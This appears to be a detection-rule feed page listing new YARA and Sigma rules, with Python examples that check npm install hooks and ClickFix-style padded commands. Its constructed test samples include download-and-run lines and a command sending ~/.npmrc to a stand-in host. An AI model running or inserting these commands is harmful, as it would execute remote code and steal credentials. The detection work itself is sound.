currently serving 23279 YARA rules and 4312 Sigma rules
New Rules per Day
Newest YARA Rules
This table shows the newest additions to the YARA rule set
Rule
Description
Date
SUSP_NPM_SupplyChain_Attack_PreInstallScript_Nov25
Detects suspicious preinstall script in package.json
25.11.2025
SUSP_NPM_SupplyChain_Attack_PostInstallScript_Nov25_2
Detects suspicious postinstall script in package.json
25.11.2025
SUSP_JS_NPM_SetupScript_Nov25
Detects suspicious JavaScript which exits silently and checks operating system
24.11.2025
MAL_NPM_SupplyChain_Attack_PreInstallScript_Nov25
Detects known malicious preinstall script in package.json
24.11.2025
MAL_APT_BADAUDIO_APT24_Nov25
Detects BADAUDIO malware observed to be used by China-linked APT24
21.11.2025
MAL_APT_Mustang_Panda_Loader_Nov25
Detects .NET based loader observed to be used by APT Mustang Panda
20.11.2025
MAL_Lockbit_Loader_Nov25
Detects a loader used to load Lockbit ransomware
20.11.2025
HKTL_POC_CopyReadProcessMemory_ShellCode_Loader_Nov25
Detects shell code loader POC - CopyReadProcessMemory
19.11.2025
HKTL_ShellCode_Loaders_Nov25
Detects shell code loader indicators often found in Rust based loaders
19.11.2025
SUSP_Loader_Indicators_Nov25
Detects indicators often found in malicious loaders
19.11.2025
SUSP_Donut_Loader_Indicators_Nov25
Detects Donut loader code overlaps
19.11.2025
SUSP_HTKL_Rust_ShellCode_Loader_Nov25
Detects indicators often found in Rust based shellcode loaders
19.11.2025
MAL_UDPGangster_Backdoor_Nov25
Detects the UDPGangster backdoor, which persists via a User Shell Folders Startup modification, copies itself, loads a local or embedded C2 config, exfiltrates system information, and supports remote command execution including shell access, file collection, file delivery, and hibernation; observed in use by the MuddyWater APT group
18.11.2025
MAL_Loader_Nov25_1
Detects a loader observed loading the UDPGangster backdoor; used by the MuddyWater APT group
18.11.2025
MAL_Kalim_Backdoor_Nov25
Detects the Kalim backdoor, which establishes persistence through scheduled tasks, Base64-encodes Unicode strings, processes SSL/TLS certificates, decrypts payloads, retrieves commands from a remote C2 server, and executes downloaded payloads; observed in use by the MuddyWater APT group
18.11.2025
MAL_PNG_ShellCode_Encoder_Nov25
Detects PNG shellcode encoder tool used to encode shellcode into PNG images for stealthy delivery
17.11.2025
MAL_NET_AsyncRAT_Nov25
Detects AsyncRAT, an open-source remote access tool used by various threat actors.
17.11.2025
SUSP_Common_Malware_Indicators_Nov25
Detects common indicators found in malware like AsyncRAT, VenomRAT etc.
17.11.2025
MAL_LNK_WebDAV_Code_Execution_Nov25
Detects suspicious LNK files that may facilitate arbitrary code execution through WebDAV manipulation similar to CVE-2025-33053.
17.11.2025
SUSP_OBF_NET_Custom_Obfuscator_Nov25
Detects .NET binaries packed with a custom obfuscator observed in use by different threat actors.
17.11.2025
MAL_Lumma_Stealer_Nov25
Detects Lumma Stealer, an information stealer targeting crypto wallets, browser data and various credentials. Lumma can also load and execute additional payloads from its C2.
17.11.2025
SUSP_PY_Loader_Indicators_Nov25
Detects suspicious Python code patterns often used in loaders
15.11.2025
SUSP_PY_Loader_Capabilities_Nov25
Detects suspicious Python function combinations often used in loaders
15.11.2025
MAL_Go_DocStealer_Nov25
Detects DocStealer - a Go-based malware that steals documents and exfiltrates them via Telegram
14.11.2025
SUSP_Go_Malware_Indicators_Nov25
Detects characteristics of Go-based malware by looking for function names often found in malicious Go binaries
14.11.2025
PUA_PDQ_Connect_Agent_Nov25
Detects PDQ Connect Agent remote management tool that may be abused by threat actors. This legitimate remote administration software is sometimes leveraged by attackers for unauthorized remote access. Requires additional context verification to distinguish between legitimate administrative use and malicious activity.
13.11.2025
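The four NPM rows at the top of this table (SUSP_NPM_SupplyChain_Attack_PreInstallScript_Nov25, SUSP_NPM_SupplyChain_Attack_PostInstallScript_Nov25_2, SUSP_JS_NPM_SetupScript_Nov25 and MAL_NPM_SupplyChain_Attack_PreInstallScript_Nov25) key on the install-lifecycle scripts in package.json, the hooks npm runs automatically when a dependency is installed. The following is an added example and not Nextron's rule logic: a stdlib-only Python check that flags what a triager looks for in preinstall/install/postinstall hooks (a download piped to a shell, an inline node -e script, eval, base64 decoding, an operating-system check of the kind SUSP_JS_NPM_SetupScript_Nov25 describes, and credential-store paths). The heuristics and the three package.json samples are constructed for the example.

```python
import json
import re
from typing import Dict, List

# Lifecycle hooks npm runs automatically during `npm install`; the rules above
# key on preinstall and postinstall, `install` sits between them.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristics (constructed for this example, not the feed's rule logic): things a
# library has no business doing in an install hook. Each entry is (pattern, reason).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b"), "download piped to shell"),
    (re.compile(r"\bnode\s+(-e|--eval)\b"), "inline node -e script"),
    (re.compile(r"\beval\s*\("), "eval() in hook"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64 decode in shell"),
    (re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]"), "base64 decode in node"),
    (re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", re.I), "encoded PowerShell"),
    (re.compile(r"\b(os\.platform|process\.platform)\b"), "OS check in hook"),
    (re.compile(r"(\$HOME|~|%USERPROFILE%)[\\/]\.(npmrc|ssh|aws|config[\\/]gcloud)\b"), "credential store path"),
]


def check_install_scripts(package_json: str) -> Dict[str, List[str]]:
    """Return {hook: [reasons]} for every install hook that trips a heuristic.
    An empty dict means nothing in the install hooks looked suspicious."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    findings: Dict[str, List[str]] = {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):  # hook absent, or malformed package.json
            continue
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            findings[hook] = reasons
    return findings


# Constructed package.json samples, not real packages from the feed.
BENIGN_PKG = json.dumps({
    "name": "left-pad-ish",
    "version": "1.0.0",
    "scripts": {"test": "mocha", "postinstall": "node scripts/build.js"},
})

# Download-and-execute in preinstall; postinstall exits silently unless the OS
# matches, then evals a base64 blob (the blob decodes to console.log('pwned')).
MALICIOUS_PKG = json.dumps({
    "name": "totally-fine-utils",
    "version": "9.9.9",
    "scripts": {
        "preinstall": "curl -s https://example.invalid/setup.sh | sh",
        "postinstall": (
            "node -e \"const os=require('os');"
            "if(os.platform()!=='win32'){process.exit(0)}"
            "eval(Buffer.from('Y29uc29sZS5sb2coJ3B3bmVkJyk=','base64').toString())\""
        ),
    },
})

# Exfiltrates the npm token: the pipe goes into curl, not out of it, so only the
# credential-path heuristic fires, not the download-piped-to-shell one.
CREDSTEAL_PKG = json.dumps({
    "name": "helpful-cli",
    "version": "0.0.1",
    "scripts": {
        "install": "cat ~/.npmrc | curl -X POST --data-binary @- https://example.invalid/c",
    },
})

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN_PKG), ("malicious", MALICIOUS_PKG), ("credsteal", CREDSTEAL_PKG)):
        print(label, check_install_scripts(pkg))
```

Run it over a lockfile's worth of package.json files before `npm install`, or wire it into CI as a gate; a hit is a reason to read the hook, not a verdict, since build steps such as native compilation legitimately call out to the shell.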
Successful YARA Rules in Set
This table shows statistics of the best rules with lowest AV detection rates (rules created in the last 12 months, matches of the last 14 days)
Rule
Average AV Detection Rate
Sample Count
Latest YARA Matches with Low AV Detection Rate
This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)
Rule | AVs | Hash
SUSP_Encoded_Net_ServicePointManager | 7 | 91d7ef33256ab18f6de4297af0984da93db4dd9fae169ac731493d687180909a
PUA_ConnectWise_ScreenConnect_Mar23 | 3 | e3274a6266bba0e8d35d0bed0a49dd22f70199e48473b6dcd866fbb803dd495a
SUSP_EXPL_ShellCode_Loader_Nov22_1 | 12 | f38a4f51c9eb6a6c8550568f71ce44bee8366d52c221c80a3f227ddb54e1ad61
HKTL_PUA_FRP_FastReverseProxy_Oct21_1 | 12 | 7642cb5820fab0ddb29ec6b97237e9d5e78e11a36d13865d91c4e70053d4cb55
HKTL_PUA_FRP_FastReverseProxy_Jan22_1 | 12 | 7642cb5820fab0ddb29ec6b97237e9d5e78e11a36d13865d91c4e70053d4cb55
SUSP_EXPL_ShellCode_Loader_Nov22_1 | 12 | edc999508620841740a78b561ef23c288e8e0cd5b0fbd5ca6cc5e22ebc40fa8e
SUSP_Encoded_GetCurrentThreadId_Ext1_Aug20 | 5 | 682a2107e5a00e5b8cb152c4a88a2009ad421707ab67032a1c417018af27c56f
SUSP_Encoded_GetCurrentThreadId_FileOnly | 5 | 682a2107e5a00e5b8cb152c4a88a2009ad421707ab67032a1c417018af27c56f
SUSP_WEBSHELL_JPEG_PHP_Code_Dec20_1 | 2 | 6d0c6c688bc79fa926f15c901df1d7c51784fa15e1199f891021c71552f765e8
HKTL_PUA_FRP_FastReverseProxy_Jan22_1 | 8 | 83a89a041494c8c08dfd3a8de646410610c37fbd2114188905cd7eefd16d346d
HKTL_PUA_FRP_FastReverseProxy_Oct21_1 | 8 | 83a89a041494c8c08dfd3a8de646410610c37fbd2114188905cd7eefd16d346d
YARA Rules Per Category
This list shows the number of YARA rules in the subscribable categories (categories overlap as a rule can be in 'n' categories)
Tag | Count
Malware | 7247
Threat Hunting (not subscribable, only in THOR scanner) | 5684
APT | 5036
Hacktools | 4766
Webshells | 2395
Exploits | 700
Newest Sigma Rules
This table shows the newest additions to the Sigma rule set
Rule
Description
Date
Suspicious Space Characters in RunMRU Registry Path - ClickFix
Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using ClickFix techniques to hide malicious commands in the Windows Run dialog box from the naked eye.
04.11.2025
Suspicious Space Characters in TypedPaths Registry Path - FileFix
Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.
04.11.2025
Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix
Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.
ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.
The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.
04.11.2025
FortiGate - New Administrator Account Created
Detects the creation of an administrator account on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - Firewall Address Object Added
Detects the addition of firewall address objects on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - New Firewall Policy Added
Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - New Local User Created
Detects the creation of a new local user on a Fortinet FortiGate Firewall.
The new local user could be used for VPN connections.
01.11.2025
FortiGate - New VPN SSL Web Portal Added
Detects the addition of a VPN SSL Web Portal on a Fortinet FortiGate Firewall.
This behavior was observed in pair with modification of VPN SSL settings.
01.11.2025
FortiGate - User Group Modified
Detects the modification of a user group on a Fortinet FortiGate Firewall.
The group could be used to grant VPN access to a network.
01.11.2025
FortiGate - VPN SSL Settings Modified
Detects the modification of VPN SSL Settings (for example, the modification of authentication rules).
This behavior was observed in pair with the addition of a VPN SSL Web Portal.
01.11.2025
Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
This behavior is a key indicator of exploitation of critical remote code execution vulnerabilities such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activity.
31.10.2025
Exploitation Activity of CVE-2025-59287 - WSUS Deserialization
Detects cast exceptions in Windows Server Update Services (WSUS) application logs that strongly indicate exploitation attempts of CVE-2025-59287, a deserialization vulnerability in WSUS.
31.10.2025
WFP Filter Added via Registry
Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
23.10.2025
Suspicious Speech Runtime Binary Child Process
Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.
Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
23.10.2025
Winrs Local Command Execution
Detects the execution of Winrs.exe where it is used to execute commands locally.
Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
22.10.2025
Potential Lateral Movement via Windows Remote Shell
Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
22.10.2025
Scheduled Task Creation via PowerShell Schedule.Service COM Object
Detects PowerShell execution using the Schedule.Service COM object to create scheduled tasks.
There are straightforward ways to create scheduled tasks with built-in Windows tools such as schtasks.exe or the New-ScheduledTask PowerShell cmdlet.
However, threat actors may use an alternative method such as the Schedule.Service COM object to create scheduled tasks in order to evade detection.
21.10.2025
PUA - AWS TruffleHog Execution
Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment.
It has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.
21.10.2025
Suspicious File Write to Webapps Root Directory
Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
20.10.2025
Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
20.10.2025
Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790)
Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop.
This is a post-authentication step corresponding to CVE-2025-57790.
20.10.2025
Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)
Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.
An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
20.10.2025
Unsigned or Unencrypted SMB Connection to Share Established
Detects SMB server connections to shares without signing or encryption enabled.
This could indicate potential lateral movement activity using unsecured SMB shares.
19.10.2025
ISATAP Router Address Was Set
Detects the configuration of a new ISATAP router on a Windows host. While ISATAP is a legitimate Microsoft technology for IPv6 transition, unexpected or unauthorized ISATAP router configurations could indicate a potential IPv6 DNS Takeover attack using tools like mitm6.
In such attacks, adversaries advertise themselves as DHCPv6 servers and set malicious ISATAP routers to intercept traffic.
This detection should be correlated with network baselines and known legitimate ISATAP deployments in your environment.
19.10.2025
AWS Bucket Deleted
Detects the deletion of S3 buckets in AWS CloudTrail logs.
Monitoring the deletion of S3 buckets is critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts.
19.10.2025
AWS ConsoleLogin Failed Authentication
Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts.
19.10.2025
AWS EnableRegion Command Monitoring
Detects the use of the EnableRegion command in AWS CloudTrail logs.
While AWS has 30+ regions, some of them are enabled by default, others must be explicitly enabled in each account separately.
There may be situations where security monitoring does not cover some new AWS regions.
Monitoring the EnableRegion command is important for identifying potential persistence mechanisms employed by adversaries, as enabling additional regions can facilitate continued access and operations within an AWS environment.
19.10.2025
AWS VPC Flow Logs Deleted
Detects the deletion of one or more VPC Flow Logs in AWS Elastic Compute Cloud (EC2) through the DeleteFlowLogs API call.
Adversaries may delete flow logs to evade detection or remove evidence of network activity, hindering forensic investigations and visibility into malicious operations.
19.10.2025
File Access Of Signal Desktop Sensitive Data
Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.
The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the user's credentials.
Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
19.10.2025
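The three ClickFix/FileFix rules above (dated 04.11.2025) look for long runs of space characters in RunMRU and TypedPaths registry values and on command lines, with the process-creation variant keying on the '#' that follows the padding. As an added example, and not one of the Sigma rules from the feed, the Python below applies the same idea to constructed registry values: it treats ordinary spaces, tabs, Unicode space separators and zero-width characters as padding, splits a command at its first long padding run, and reports what sits on each side and whether the trailing part starts with '#'. The RunMRU and TypedPaths samples, the threshold of 20 padding characters and the helper names are assumptions made for the example; the trailing "\1" on RunMRU entries is how Explorer stores them.

```python
import unicodedata
from typing import Dict, List, Optional

# Characters a ClickFix/FileFix lure uses to shove the real command off-screen:
# plain space, tab, every Unicode space separator (category Zs: NBSP U+00A0,
# en/em spaces U+2002/U+2003, ideographic space U+3000, ...) and zero-width
# characters, which are not Zs but pad just as well.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def is_padding_char(ch: str) -> bool:
    return ch in " \t" or unicodedata.category(ch) == "Zs" or ch in ZERO_WIDTH


def padding_runs(s: str, min_len: int) -> List[tuple]:
    """Return (start, length) for every run of padding characters of at least min_len."""
    runs, i, n = [], 0, len(s)
    while i < n:
        if not is_padding_char(s[i]):
            i += 1
            continue
        j = i
        while j < n and is_padding_char(s[j]):
            j += 1
        if j - i >= min_len:
            runs.append((i, j - i))
        i = j
    return runs


def analyze_command(cmd: str, min_pad: int = 20) -> Optional[dict]:
    """Split a command at its first long padding run.
    Returns None when the command has no padding run of min_pad or more; otherwise
    the text before the padding, the padding's length and code points, the text
    after it, and whether that trailing text starts with the '#' comment marker."""
    runs = padding_runs(cmd, min_pad)
    if not runs:
        return None
    start, length = runs[0]
    after = cmd[start + length:]
    return {
        "before": cmd[:start],
        "pad_len": length,
        "pad_chars": sorted({"U+%04X" % ord(c) for c in cmd[start:start + length]}),
        "after": after,
        "comment_marker": after.startswith("#"),
    }


def registry_commands(values: Dict[str, str]) -> List[tuple]:
    """Turn RunMRU or TypedPaths values into (value_name, command) pairs.
    RunMRU stores each entry with a trailing '\\1' and keeps the order in 'MRUList';
    TypedPaths (url1, url2, ...) stores the typed string as-is."""
    out = []
    for name, val in values.items():
        if name == "MRUList":
            continue
        out.append((name, val[:-2] if val.endswith("\\1") else val))
    return out


def triage_registry_values(values: Dict[str, str], min_pad: int = 20) -> List[str]:
    """Names of the values whose command carries ClickFix/FileFix-style padding."""
    return [name for name, cmd in registry_commands(values)
            if analyze_command(cmd, min_pad) is not None]


# Constructed samples, not data from a real host.
RUNMRU_SAMPLE = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w h -c "iwr https://example.invalid/x|iex"'
         + "\u2003" * 40                                   # 40 em spaces
         + "# I am not a robot - Verification ID 7312\\1",
}
TYPEDPATHS_SAMPLE = {
    "url1": "C:\\Users\\alice\\Documents",
    "url2": 'powershell.exe -c "iex(iwr https://example.invalid/y)"'
            + "\u00a0" * 60                                # 60 no-break spaces
            + "# C:\\company\\internal-secure\\report.pdf",
}

if __name__ == "__main__":
    for hive, values in (("RunMRU", RUNMRU_SAMPLE), ("TypedPaths", TYPEDPATHS_SAMPLE)):
        for name, cmd in registry_commands(values):
            hit = analyze_command(cmd)
            if hit:
                print(f"{hive}\\{name}: {hit['before']!r} + {hit['pad_len']} pad chars "
                      f"{hit['pad_chars']} + {hit['after']!r}")
```

Reporting the code points of the padding matters for triage: a run of U+2003 or U+3000 in a Run-dialog command is almost never typed by hand, whereas plain spaces do turn up in legitimate pasted paths, so the exotic separators are the stronger signal.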
YARA/SIGMA Rule Count
Rule Type | Community Feed | Nextron Private Feed
YARA | 2709 | 20570
Sigma | 3491 | 821
Sigma Rules Per Category (Community)
Type | Count
windows / process_creation | 1309
windows / registry_set | 208
windows / file_event | 203
windows / ps_script | 164
windows / security | 159
linux / process_creation | 128
windows / image_load | 111
webserver | 82
windows / system | 74
macos / process_creation | 68
aws / cloudtrail | 54
proxy | 53
linux / auditd | 53
windows / network_connection | 52
azure / activitylogs | 42
windows / registry_event | 39
azure / auditlogs | 38
windows / ps_module | 33
windows / application | 31
windows / dns_query | 25
azure / signinlogs | 24
windows / process_access | 23
okta / okta | 22
azure / riskdetection | 19
opencanary / application | 18
windows / pipe_created | 18
linux | 17
rpc_firewall / application | 17
github / audit | 16
gcp / gcp.audit | 16
windows / windefend | 16
bitbucket / audit | 14
windows / file_delete | 13
m365 / threat_management | 13
linux / file_event | 12
cisco / aaa | 12
windows / create_remote_thread | 12
windows / driver_load | 10
kubernetes / application / audit | 10
windows / codeintegrity-operational | 10
windows / create_stream_hash | 9
windows / registry_add | 9
windows / registry_delete | 9
windows / ps_classic_start | 9
dns | 9
windows / firewall-as | 8
windows / msexchange-management | 8
fortigate / event | 7
windows / appxdeployment-server | 7
windows / file_access | 7
azure / pim | 7
windows / bits-client | 7
gcp / google_workspace.admin | 7
zeek / smb_files | 7
antivirus | 7
windows / dns-client | 6
jvm / application | 5
kubernetes / audit | 5
zeek / dns | 5
linux / network_connection | 5
zeek / http | 5
zeek / dce_rpc | 4
windows / sysmon | 4
windows / taskscheduler | 4
windows / iis-configuration | 4
windows / ntlm | 3
linux / sshd | 3
m365 / audit | 3
windows / wmi_event | 3
windows / powershell-classic | 3
firewall | 2
linux / syslog | 2
windows / file_change | 2
windows / security-mitigations | 2
windows / dns-server | 2
macos / file_event | 2
spring / application | 2
apache | 2
onelogin / onelogin.events | 2
windows / lsa-server | 1
windows / printservice-operational | 1
database | 1
linux / clamav | 1
linux / auth | 1
linux / guacamole | 1
windows / applocker | 1
windows / openssh | 1
django / application | 1
fortios / sslvpnd | 1
linux / cron | 1
juniper / bgp | 1
windows / appmodel-runtime | 1
windows / process_tampering | 1
cisco / syslog | 1
huawei / bgp | 1
windows / appxpackaging-om | 1
windows / smbserver-connectivity | 1
windows / smbclient-connectivity | 1
windows / capi2 | 1
windows / shell-core | 1
windows / raw_access_thread | 1
paloalto / file_event / globalprotect | 1
linux / vsftpd | 1
zeek / x509 | 1
windows / certificateservicesclient-lifecycle-system | 1
nodejs / application | 1
paloalto / appliance / globalprotect | 1
windows / smbclient-security | 1
windows / diagnosis-scripted | 1
windows / microsoft-servicebus-client | 1
windows / file_executable_detected | 1
python / application | 1
windows / file_rename | 1
windows / sysmon_status | 1
m365 / exchange | 1
zeek / rdp | 1
windows / terminalservices-localsessionmanager | 1
ruby_on_rails / application | 1
m365 / threat_detection | 1
zeek / kerberos | 1
windows / driver-framework | 1
windows / sysmon_error | 1
windows | 1
sql / application | 1
cisco / duo | 1
linux / sudo | 1
velocity / application | 1
cisco / bgp | 1
nginx | 1
windows / ldap | 1
windows / wmi | 1
windows / dns-server-analytic | 1
cisco / ldp | 1
windows / ps_classic_provider_start | 1
windows / printservice-admin | 1
Sigma Rules Per Category (Nextron Private Feed)
Type | Count
windows / process_creation | 389
windows / registry_set | 78
windows / ps_script | 75
windows / image_load | 43
windows / file_event | 38
linux / process_creation | 34
windows / wmi | 29
windows / security | 22
proxy | 12
windows / system | 9
windows / registry_event | 8
windows / network_connection | 8
windows / kernel-event-tracing | 6
windows / ps_module | 5
windows / ntfs | 5
windows / sense | 4
windows / taskscheduler | 4
windows / create_remote_thread | 4
windows / registry_delete | 4
windows / pipe_created | 4
windows / ps_classic_script | 3
windows / vhd | 3
webserver | 3
windows / application-experience | 3
windows / driver_load | 3
windows / hyper-v-worker | 3
windows / process_access | 2
windows / windefend | 2
windows / bits-client | 2
windows / codeintegrity-operational | 2
windows / kernel-shimengine | 2
macos / process_creation | 1
windows / amsi | 1
windows / process-creation | 1
windows / audit-cve | 1
windows / file_delete | 1
windows / file_access | 1
windows / registry-setinformation | 1
windows / firewall-as | 1
linux / file_event | 1
windows / application | 1
windows / dns_query | 1
windows / file_rename | 1
Tenable Nessus
Requirement: Privileged Scan
- YARA Scanning with Nessus works only when scanning with credentials (privileged scan)
YARA Scanning with Nessus
- You can only upload a single .yar file
- Filesystem scan has to be activated
- You have to define the target locations
- The Nessus plugin ID will be 91990
- Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls
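Because Nessus takes exactly one .yar file, rule files from the feed have to be merged before upload. The following added example is a merge script written for this page, not Nextron or Tenable code: it hoists every `import "module"` line to the top once, reports duplicate rule names (YARA refuses to compile a file that defines the same name twice) and reports `include` statements, which a single uploaded file has nothing to resolve against. The two rule texts are constructed samples, and whether the Nessus plugin accepts module imports at all is not stated on this page and is not assumed here.

```python
import re
import sys
from typing import Dict, List, Tuple

# A rule header at the start of a line: optional `private`/`global` modifiers,
# then `rule <identifier>`. Strings inside a rule are indented and start with
# `$`, so the line-anchored match does not pick up the word "rule" in them.
RULE_HEADER = re.compile(r"^[ \t]*(?:(?:private|global)[ \t]+)*rule[ \t]+([A-Za-z_][A-Za-z0-9_]*)", re.M)
IMPORT_LINE = re.compile(r'^[ \t]*import[ \t]+"([^"]+)"[ \t]*\n?', re.M)
INCLUDE_LINE = re.compile(r'^[ \t]*include[ \t]+"', re.M)


def merge_yara_sources(sources: Dict[str, str]) -> Tuple[str, List[str]]:
    """Merge several rule files (name -> text) into one .yar text.
    Returns (merged_text, warnings). Module imports are hoisted to the top once
    each; duplicate rule names and include statements are reported as warnings."""
    imports: List[str] = []
    first_seen: Dict[str, str] = {}
    warnings: List[str] = []
    bodies: List[str] = []
    for fname, text in sources.items():
        for module in IMPORT_LINE.findall(text):
            if module not in imports:
                imports.append(module)
        if INCLUDE_LINE.search(text):
            warnings.append(f"{fname}: has include statements; inline the included file instead")
        for name in RULE_HEADER.findall(text):
            if name in first_seen:
                warnings.append(f"duplicate rule name {name} in {fname} (first seen in {first_seen[name]})")
            else:
                first_seen[name] = fname
        # Drop the per-file imports; they are re-emitted once in the header.
        bodies.append(f"// ---- from {fname} ----\n" + IMPORT_LINE.sub("", text).strip())
    header = "".join(f'import "{m}"\n' for m in imports)
    merged = header + ("\n" if header else "") + "\n\n".join(bodies) + "\n"
    return merged, warnings


# Constructed rule texts for demonstration, not rules from the feed.
SAMPLE_A = '''import "pe"

rule Demo_One {
    meta:
        description = "constructed sample"
    strings:
        $s = "rule this string must not count as a header"
    condition:
        pe.is_pe and $s
}
'''
SAMPLE_B = '''import "pe"
import "math"

private rule Demo_Helper { condition: uint16(0) == 0x5a4d }

rule Demo_One { condition: Demo_Helper and math.entropy(0, filesize) > 7.0 }
'''

if __name__ == "__main__":
    # Usage: python merge_yara.py a.yar b.yar ... > merged.yar   (warnings go to stderr)
    files = {p: open(p, encoding="utf-8").read() for p in sys.argv[1:]} \
        or {"a.yar": SAMPLE_A, "b.yar": SAMPLE_B}
    text, warns = merge_yara_sources(files)
    for w in warns:
        print("warning:", w, file=sys.stderr)
    sys.stdout.write(text)
```

Run `yarac` over the merged output before uploading it; the script catches name collisions, but only the compiler catches a rule that references a module the plugin does not load.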
